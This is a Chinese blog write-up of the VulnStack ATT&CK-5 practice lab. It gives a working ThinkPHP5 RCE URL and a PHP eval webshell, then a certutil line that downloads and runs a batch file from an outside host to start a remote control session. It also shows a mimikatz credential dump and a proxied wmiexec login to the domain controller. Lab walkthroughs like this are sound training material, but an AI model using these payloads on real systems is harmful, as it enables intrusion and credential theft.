VulnStack-ATT&CK-5(红日5)一刷

服务器渗透

信息收集

nmap -sV -n -v 192.168.3.1/24

在这里插入图片描述

访问192.168.3.6的80端口,发现是thinkphp5,存在RCE漏洞,利用方式

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

GetShell

http://192.168.3.6/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3c%3fphp+%40eval(%24_POST%5b%27cmd%27%5d)%3b%3f%3e

蚁剑连接地址http://192.168.3.6/shell.php,连接密码cmd

查网络配置

连接后执行

ipconfig /all

在这里插入图片描述

发现在域中,有一张内网网卡

ping sun.com

在这里插入图片描述

域控DC为192.168.138.138

VShell连接和开隧道

在这里插入图片描述

在蚁剑中执行上线命令

certutil.exe -urlcache -split -f http://192.168.3.3:10012/swt C:\Users\Public\run.bat && C:\Users\Public\run.bat

在这里插入图片描述

上线成功,开启隧道,端口6005,并且配置/etc/proxychains.conf的socks5

在这里插入图片描述

获取明文密码

将mimikatz.exe上传到靶机,并且执行下面命令

mimikatz.exe log privilege::debug sekurlsa::logonpasswords

在这里插入图片描述

内网渗透

wmiexec-pro登录DC

proxychains4 python3 wmiexec-pro.py 'Administrator:dc123.com@192.168.138.138' exec-command -shell

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值